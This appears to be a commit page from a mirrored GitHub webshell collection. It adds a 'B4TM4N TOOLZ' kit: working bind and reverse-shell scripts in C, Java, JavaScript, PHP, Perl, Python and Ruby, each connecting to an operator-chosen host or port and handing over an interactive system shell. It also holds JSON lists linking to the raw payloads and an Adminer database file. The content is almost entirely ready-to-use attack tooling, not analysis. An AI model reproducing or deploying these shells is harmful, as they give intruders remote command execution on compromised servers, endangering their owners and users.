mirror of
https://github.com/tennc/webshell
synced 2024-11-21 18:53:03 +00:00
parent
ddb43c6b88
commit
f803bba0fb
11 changed files with 2368 additions and 0 deletions
3
b4tm4n-toolz/README.md
Normal file
3
b4tm4n-toolz/README.md
Normal file
|
@ -0,0 +1,3 @@
|
|||
# B4TM4N TOOLZ
|
||||
|
||||
The Tools for B4TM4N ~ PHP WEBSHELL
|
42
b4tm4n-toolz/backconnect/back.h
Normal file
42
b4tm4n-toolz/backconnect/back.h
Normal file
|
@ -0,0 +1,42 @@
|
|||
#include <stdio.h>
|
||||
#include <string.h>
|
||||
#include <stdlib.h>
|
||||
#include <sys/types.h>
|
||||
#include <sys/socket.h>
|
||||
#include <netinet/in.h>
|
||||
#include <unistd.h>
|
||||
int main(int argc,char *argv[]){
|
||||
int s,c,o=1;
|
||||
struct sockaddr_in i;
|
||||
if(argc==2){
|
||||
i.sin_family=AF_INET;
|
||||
i.sin_port=htons(atoi(argv[1]));
|
||||
i.sin_addr.s_addr=htonl(INADDR_ANY);
|
||||
s=socket(AF_INET,SOCK_STREAM,0);
|
||||
setsockopt(s,SOL_SOCKET,SO_REUSEADDR,&o,sizeof(o));
|
||||
if(!s)exit(0);
|
||||
bind(s,(struct sockaddr *)&i,0x10);
|
||||
listen(s,5);
|
||||
c=accept(s,0,0);
|
||||
send(c,"b4tm4n shell : connected\n",24,0);
|
||||
dup2(c,0);
|
||||
dup2(c,1);
|
||||
dup2(c,2);
|
||||
system("export TERM=xterm;PS1='$PWD>';export PS1;exec /bin/sh -i");
|
||||
close(c);
|
||||
}
|
||||
else if(argc==3){
|
||||
i.sin_family=AF_INET;
|
||||
i.sin_port=htons(atoi(argv[1]));
|
||||
i.sin_addr.s_addr=inet_addr(argv[2]);
|
||||
bzero(argv[2],strlen(argv[2])+1+strlen(argv[1]));
|
||||
s=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
|
||||
if((connect(s,(struct sockaddr *)&i,sizeof(struct sockaddr)))<0)exit(0);
|
||||
send(s,"b4tm4n shell : connected\n",24,0);
|
||||
dup2(s,0);
|
||||
dup2(s,1);
|
||||
dup2(s,2);
|
||||
system("export TERM=xterm;PS1='$PWD>';export PS1;exec /bin/sh -i");
|
||||
close(s);
|
||||
}
|
||||
}
|
57
b4tm4n-toolz/backconnect/back.java
Normal file
57
b4tm4n-toolz/backconnect/back.java
Normal file
|
@ -0,0 +1,57 @@
|
|||
import java.io.*;
|
||||
import java.net.*;
|
||||
|
||||
public class b4tm4n_rs{
|
||||
private static final class pt extends Thread{
|
||||
private InputStream is;
|
||||
private OutputStream out;
|
||||
|
||||
public pt(InputStream is, OutputStream out){this.is=is;this.out=out;}
|
||||
|
||||
@Override
|
||||
public void run(){
|
||||
try{
|
||||
byte[] b = new byte[8192];
|
||||
int c = is.read(b);
|
||||
while(c>=0) {
|
||||
out.write(b,0,c);
|
||||
out.flush();
|
||||
c = is.read(b);
|
||||
}
|
||||
}
|
||||
catch(Exception e){e.printStackTrace();}
|
||||
}
|
||||
}
|
||||
|
||||
public static void main(String[] args){
|
||||
int port;
|
||||
String cmd = "/bin/sh";
|
||||
if(System.getProperty("os.name").toLowerCase().indexOf("win")>=0){cmd = "cmd";}
|
||||
String w = "b4tm4n shell : connected\n";
|
||||
byte[] b = w.getBytes();
|
||||
Socket h = new Socket();
|
||||
try{
|
||||
if(args.length==1){
|
||||
port = Integer.parseInt(args[0]);
|
||||
ServerSocket s = new ServerSocket(port);
|
||||
h = s.accept();
|
||||
}
|
||||
else if(args.length==2){
|
||||
port = Integer.parseInt(args[0]);
|
||||
String ip = args[1];
|
||||
h = new Socket(ip, port);
|
||||
}
|
||||
if(args.length==1 || args.length==2){
|
||||
InputStream gis = h.getInputStream();
|
||||
OutputStream gos = h.getOutputStream();
|
||||
gos.write(b);
|
||||
Process p = Runtime.getRuntime().exec(cmd);
|
||||
|
||||
pt p1 = new pt(p.getInputStream(), gos);
|
||||
pt p2 = new pt(gis, p.getOutputStream());
|
||||
p1.start();p2.start();
|
||||
}
|
||||
}
|
||||
catch(Exception e){e.printStackTrace();}
|
||||
}
|
||||
}
|
29
b4tm4n-toolz/backconnect/back.js
Normal file
29
b4tm4n-toolz/backconnect/back.js
Normal file
|
@ -0,0 +1,29 @@
|
|||
var spawn = require('child_process').spawn;
|
||||
var net = require('net');
|
||||
var stream = require('stream');
|
||||
var console = require('console');
|
||||
|
||||
var shell = '/bin/sh';
|
||||
if(process.platform.match(/^win/i)) shell = 'cmd.exe';
|
||||
|
||||
var argv = process.argv;
|
||||
if(argv.length==3){
|
||||
var h = net.createServer(function(s){
|
||||
s.write("b4tm4n shell : connected\n");
|
||||
var sh = spawn(shell);
|
||||
sh.stdin.resume()
|
||||
sh.stdout.on("data",function (data){s.write(data);});
|
||||
sh.stderr.on("data",function (data){s.write(data);});
|
||||
s.on("data",function (data){sh.stdin.write(data);});
|
||||
});
|
||||
h.listen(argv[2]);
|
||||
}
|
||||
else if(argv.length==4){
|
||||
var s = net.createConnection(argv[2], argv[3]);
|
||||
s.write("b4tm4n shell : connected\n");
|
||||
var sh = spawn(shell);
|
||||
sh.stdin.resume()
|
||||
sh.stdout.on("data",function (data){s.write(data);});
|
||||
sh.stderr.on("data",function (data){s.write(data);});
|
||||
s.on("data",function (data){sh.stdin.write(data);});
|
||||
}
|
128
b4tm4n-toolz/backconnect/back.php
Normal file
128
b4tm4n-toolz/backconnect/back.php
Normal file
|
@ -0,0 +1,128 @@
|
|||
<?php
|
||||
error_reporting(0);
|
||||
set_time_limit(0);
|
||||
ob_implicit_flush();
|
||||
|
||||
$targets=explode(" ",$target);
|
||||
$cs=1337;
|
||||
$wa=null;
|
||||
$ea=null;
|
||||
$sh="export TERM=xterm;PS1='\$PWD>';export PS1;/bin/sh -i";
|
||||
$m="b4tm4n shell : connected\n";
|
||||
|
||||
if(count($targets)==1){
|
||||
$p=$target;
|
||||
$h="";
|
||||
$t="bind";
|
||||
}
|
||||
elseif(count($targets)==2){
|
||||
$p=$targets[0];
|
||||
$h=$targets[1];
|
||||
$t="back";
|
||||
}
|
||||
|
||||
if(function_exists('pcntl_fork')){
|
||||
$pid=pcntl_fork();
|
||||
if($pid==-1)exit(1);
|
||||
if($pid)exit(0);
|
||||
if(posix_setsid()==-1)exit(1);
|
||||
}
|
||||
|
||||
if($t=="bind"){
|
||||
$s=stream_socket_server("tcp://0.0.0.0:".$p,$errno,$errstr);
|
||||
stream_set_timeout($s,30);
|
||||
$c=stream_socket_accept($s);
|
||||
if(strtolower(substr(php_uname(),0,3))=="win"){
|
||||
fwrite($c,$m.getcwd().">");
|
||||
while($p!==false){
|
||||
$p=fgets($c);
|
||||
if(preg_match("/cd\ ([^\s]+)/i",$p,$rr)){
|
||||
$dd=$rr[1];
|
||||
if(is_dir($dd))chdir($dd);
|
||||
$o=getcwd().">";
|
||||
}
|
||||
elseif(trim(strtolower($p))=="exit" || trim(strtolower($p))=="quit") break;
|
||||
else $o=exe($p)."\n".getcwd().">";
|
||||
fwrite($c,$o);
|
||||
}
|
||||
fclose($c);
|
||||
fclose($s);
|
||||
}
|
||||
else{
|
||||
fwrite($c,$m);
|
||||
$ds=array(0=>array("pipe","r"),1=>array("pipe","w"),2=>array("pipe","w"));
|
||||
$pr=proc_open($sh,$ds,$pip);
|
||||
if(!is_resource($pr))exit(1);
|
||||
stream_set_blocking($pip[0],0);
|
||||
stream_set_blocking($pip[1],0);
|
||||
stream_set_blocking($pip[2],0);
|
||||
stream_set_blocking($c,0);
|
||||
while(true){
|
||||
if(feof($c)||feof($pip[1]))break;
|
||||
$ra=array($c,$pip[1],$pip[2]);
|
||||
stream_select($ra,$wa,$ea,null);
|
||||
if(in_array($c,$ra)){
|
||||
$i=fread($c,$cs);
|
||||
fwrite($pip[0],$i);
|
||||
}
|
||||
if(in_array($pip[1],$ra)){
|
||||
$i=fread($pip[1],$cs);
|
||||
fwrite($c,$i);
|
||||
}
|
||||
if(in_array($pip[2],$ra)){
|
||||
$i=fread($pip[2],$cs);
|
||||
fwrite($c,$i);
|
||||
}
|
||||
}
|
||||
fclose($s);fclose($c);fclose($pip[0]);fclose($pip[1]);fclose($pip[2]);
|
||||
proc_close($pr);
|
||||
}
|
||||
}
|
||||
elseif($t=="back"){
|
||||
$s=fsockopen($h,$p,$en,$es,30);
|
||||
if(strtolower(substr(php_uname(),0,3))=="win"){
|
||||
fwrite($s,$m.getcwd().">");
|
||||
while($p!==false){
|
||||
$p=fgets($s);
|
||||
if(preg_match("/cd\ ([^\s]+)/i",$p,$rr)){
|
||||
$dd=$rr[1];
|
||||
if(is_dir($dd))chdir($dd);
|
||||
$o=getcwd().">";
|
||||
}
|
||||
elseif(trim(strtolower($p))=="exit" || trim(strtolower($p))=="quit") break;
|
||||
else $o=exe($p)."\n".getcwd().">";
|
||||
fwrite($s,$o);
|
||||
}
|
||||
fclose($s);
|
||||
}
|
||||
else{
|
||||
fwrite($s,$m);
|
||||
$ds=array(0=>array("pipe","r"),1=>array("pipe","w"),2=>array("pipe","w"));
|
||||
$pr=proc_open($sh,$ds,$pip);
|
||||
if(!is_resource($pr))exit(1);
|
||||
stream_set_blocking($pip[0],0);
|
||||
stream_set_blocking($pip[1],0);
|
||||
stream_set_blocking($pip[2],0);
|
||||
stream_set_blocking($s,0);
|
||||
while(true){
|
||||
if(feof($s)||feof($pip[1]))break;
|
||||
$ra=array($s,$pip[1],$pip[2]);
|
||||
stream_select($ra,$wa,$ea,null);
|
||||
if(in_array($s,$ra)){
|
||||
$i=fread($s,$cs);
|
||||
fwrite($pip[0],$i);
|
||||
}
|
||||
if(in_array($pip[1],$ra)){
|
||||
$i=fread($pip[1],$cs);
|
||||
fwrite($s,$i);
|
||||
}
|
||||
if(in_array($pip[2],$ra)){
|
||||
$i=fread($pip[2],$cs);
|
||||
fwrite($s,$i);
|
||||
}
|
||||
}
|
||||
fclose($s);fclose($pip[0]);fclose($pip[1]);fclose($pip[2]);
|
||||
proc_close($pr);
|
||||
}
|
||||
}
|
||||
?>
|
31
b4tm4n-toolz/backconnect/back.pl
Normal file
31
b4tm4n-toolz/backconnect/back.pl
Normal file
|
@ -0,0 +1,31 @@
|
|||
#!/usr/bin/env perl
|
||||
use IO::Socket;
|
||||
$os=$^O;
|
||||
$sh="export TERM=xterm;PS1='\$PWD\>';export PS1;/bin/sh -i";
|
||||
if($os=~m/win/i){$sh="%COMSPEC% /K";}
|
||||
$t=getprotobyname('tcp');
|
||||
socket(S,&PF_INET,&SOCK_STREAM,$t)||die();
|
||||
if(@ARGV==1){
|
||||
$p=$ARGV[0];
|
||||
setsockopt(S,SOL_SOCKET,SO_REUSEADDR,1);
|
||||
bind(S,sockaddr_in($p,INADDR_ANY))||die();
|
||||
listen(S,3)||die();
|
||||
accept(C,S);
|
||||
send(C,"b4tm4n shell : connected\n",0);
|
||||
open STDIN,"<&C";open STDOUT,">&C";open STDERR,">&C";
|
||||
exec $sh||die();
|
||||
close(C);close(S);close(STDIN);close(STDOUT);close(STDERR);
|
||||
exit 0;
|
||||
}
|
||||
elsif(@ARGV==2){
|
||||
$p=$ARGV[0];
|
||||
$h=$ARGV[1];
|
||||
$i=inet_aton($h)||die();
|
||||
$a=sockaddr_in($p,$i)||die();
|
||||
connect(S,$a)||die();
|
||||
send(S,"b4tm4n shell : connected\n",0);
|
||||
open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");
|
||||
exec $sh||die();
|
||||
close(S);close(STDIN);close(STDOUT);close(STDERR);
|
||||
}
|
||||
else{exit(1);}
|
64
b4tm4n-toolz/backconnect/back.py
Normal file
64
b4tm4n-toolz/backconnect/back.py
Normal file
|
@ -0,0 +1,64 @@
|
|||
#!/usr/bin/env python
|
||||
import re,subprocess,os,sys,socket,time
|
||||
p=""
|
||||
h=""
|
||||
def shell(c):
|
||||
proc=subprocess.Popen(c,shell=True,stdout=subprocess.PIPE,stderr=subprocess.PIPE,stdin=subprocess.PIPE)
|
||||
return proc.stdout.read()+proc.stderr.read()+prompt().encode('utf-8')
|
||||
|
||||
def action(c):
|
||||
if os.name!="nt":
|
||||
f=c.fileno()
|
||||
os.system("export TERM=xterm;PS1='$PWD>';export PS1;/bin/sh -i <&"+str(f)+" >&"+str(f)+" 2>&"+str(f))
|
||||
else:
|
||||
while True:
|
||||
try:
|
||||
r=c.recv(1024).decode("utf-8")
|
||||
except:
|
||||
pass
|
||||
else:
|
||||
if len(r)>0:
|
||||
b=re.search("cd\ ([^\s]+)",r,flags=re.IGNORECASE)
|
||||
if b:
|
||||
if os.path.isdir(b.group(1)):
|
||||
os.chdir(b.group(1))
|
||||
c.send(prompt().encode('utf-8'))
|
||||
else:
|
||||
out=shell(r)
|
||||
if out and len(out)>0:c.send(out)
|
||||
else: return False
|
||||
|
||||
def prompt():
|
||||
return "\n"+os.getcwd()+">"
|
||||
g=sys.argv
|
||||
if len(g)==2:
|
||||
p=g[1]
|
||||
elif len(g)==3:
|
||||
p=g[1]
|
||||
h=g[2]
|
||||
else:exit(1)
|
||||
p=int(p)
|
||||
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
|
||||
s.setsockopt(socket.SOL_SOCKET,socket.SO_REUSEADDR,1)
|
||||
if len(g)==2:
|
||||
s.bind(("0.0.0.0",p))
|
||||
s.listen(5)
|
||||
try:(c,a)=s.accept()
|
||||
except:
|
||||
time.sleep(1)
|
||||
else:
|
||||
if os.name!="nt":
|
||||
c.send(("b4tm4n shell : connected\n").encode('utf-8'))
|
||||
else:
|
||||
c.send(("b4tm4n shell : connected"+prompt()).encode('utf-8'))
|
||||
action(c)
|
||||
if len(g)==3:
|
||||
try: s.connect((h,p))
|
||||
except:
|
||||
time.sleep(5)
|
||||
else:
|
||||
if os.name!="nt":
|
||||
s.send(("b4tm4n shell : connected\n").encode('utf-8'))
|
||||
else:
|
||||
s.send(("b4tm4n shell : connected"+prompt()).encode('utf-8'))
|
||||
action(s)
|
100
b4tm4n-toolz/backconnect/back.rb
Normal file
100
b4tm4n-toolz/backconnect/back.rb
Normal file
|
@ -0,0 +1,100 @@
|
|||
#!/usr/bin/env ruby
|
||||
require 'socket'
|
||||
require 'pathname'
|
||||
|
||||
def sucks
|
||||
return RUBY_PLATFORM.downcase.match('mswin|win|mingw')?true:false
|
||||
end
|
||||
|
||||
def realpath(str)
|
||||
r=str
|
||||
if File.exists?(str)
|
||||
r=Pathname.new(str).realpath.to_s
|
||||
end
|
||||
if sucks then r=r.gsub(/\//,"\\") end
|
||||
return r
|
||||
end
|
||||
|
||||
if ARGV.length==1
|
||||
ARGV[0]=~/^[0-9]{1,5}$/?p=Integer(ARGV[0]):exit
|
||||
s=TCPServer.new("",p)
|
||||
c=s.accept
|
||||
c.print "b4tm4n shell : connected\n"
|
||||
begin
|
||||
if not sucks
|
||||
f=c.to_i
|
||||
exec sprintf("export TERM=xterm;PS1='\$PWD\>';export PS1;/bin/sh -i \<\&%d \>\&%d 2\>\&%d",f,f,f)
|
||||
else
|
||||
c.print realpath(".")+">"
|
||||
while l=c.gets
|
||||
raise errorBro if l=~/^die\r?$/
|
||||
if not l.chomp==""
|
||||
if l=~/cd .*/i
|
||||
l=l.gsub(/cd /i,'').chomp
|
||||
if File.directory?(l)
|
||||
l=realpath(l)
|
||||
Dir.chdir(l)
|
||||
end
|
||||
c.print realpath(".")+">"
|
||||
elsif l=~/\w:.*/i
|
||||
if File.directory?(l.chomp)
|
||||
Dir.chdir(l.chomp)
|
||||
end
|
||||
c.print realpath(".")+">"
|
||||
else
|
||||
IO.popen(l,"r"){|io|c.print io.read+"\n"+realpath(".")+">"}
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
rescue errorBro
|
||||
exit
|
||||
ensure
|
||||
s.close
|
||||
s=nil
|
||||
end
|
||||
elsif ARGV.length==2
|
||||
if ARGV[0]=~/^[0-9]{1,5}$/
|
||||
p=Integer(ARGV[0]);
|
||||
h=ARGV[1]
|
||||
else
|
||||
exit
|
||||
end
|
||||
s=TCPSocket.new("#{h}",p)
|
||||
s.print "b4tm4n shell : connected\n"
|
||||
begin
|
||||
if not sucks
|
||||
f=s.to_i
|
||||
exec sprintf("export TERM=xterm;PS1='\$PWD\>';export PS1;/bin/sh -i \<\&%d \>\&%d 2\>\&%d",f,f,f)
|
||||
else
|
||||
s.print realpath(".")+">"
|
||||
while l=s.gets
|
||||
raise errorBro if l=~/^die\r?$/i
|
||||
if not l.chomp==""
|
||||
if l=~/cd .*/i
|
||||
l=l.gsub(/cd /i,'').chomp
|
||||
if File.directory?(l)
|
||||
l=realpath(l)
|
||||
Dir.chdir(l)
|
||||
end
|
||||
s.print realpath(".")+">"
|
||||
elsif l=~/\w:.*/i
|
||||
if File.directory?(l.chomp)
|
||||
Dir.chdir(l.chomp)
|
||||
end
|
||||
s.print realpath(".")+">"
|
||||
else
|
||||
IO.popen(l,"r"){|io|s.print io.read+"\n"+realpath(".")+">"}
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
rescue errorBro
|
||||
exit
|
||||
ensure
|
||||
s.close
|
||||
s=nil
|
||||
end
|
||||
else
|
||||
exit
|
||||
end
|
9
b4tm4n-toolz/backconnect/list.json
Normal file
9
b4tm4n-toolz/backconnect/list.json
Normal file
|
@ -0,0 +1,9 @@
|
|||
{"b4tm4n_t00lz":[
|
||||
{ "name":"C Shell", "url":"https://raw.githubusercontent.com/k4mpr3t/b4tm4n-toolz/master/backconnect/back.h" },
|
||||
{ "name":"Java Shell", "url":"https://raw.githubusercontent.com/k4mpr3t/b4tm4n-toolz/master/backconnect/back.java" },
|
||||
{ "name":"Javascript Shell", "url":"https://raw.githubusercontent.com/k4mpr3t/b4tm4n-toolz/master/backconnect/back.js" },
|
||||
{ "name":"Php Shell", "url":"https://raw.githubusercontent.com/k4mpr3t/b4tm4n-toolz/master/backconnect/back.php" },
|
||||
{ "name":"Perl Shell", "url":"https://raw.githubusercontent.com/k4mpr3t/b4tm4n-toolz/master/backconnect/back.pl" },
|
||||
{ "name":"Python Shell", "url":"https://raw.githubusercontent.com/k4mpr3t/b4tm4n-toolz/master/backconnect/back.py" },
|
||||
{ "name":"Ruby Shell", "url":"https://raw.githubusercontent.com/k4mpr3t/b4tm4n-toolz/master/backconnect/back.rb" },
|
||||
]}
|
1902
b4tm4n-toolz/database/adminer-4.5.0.php
Normal file
1902
b4tm4n-toolz/database/adminer-4.5.0.php
Normal file
File diff suppressed because one or more lines are too long
3
b4tm4n-toolz/database/list.json
Normal file
3
b4tm4n-toolz/database/list.json
Normal file
|
@ -0,0 +1,3 @@
|
|||
{"b4tm4n_t00lz":[
|
||||
{ "name":"Adminer 4.5.0", "url":"https://raw.githubusercontent.com/k4mpr3t/b4tm4n-toolz/master/database/adminer-4.5.0.php" },
|
||||
]}
|
Loading…
Reference in a new issue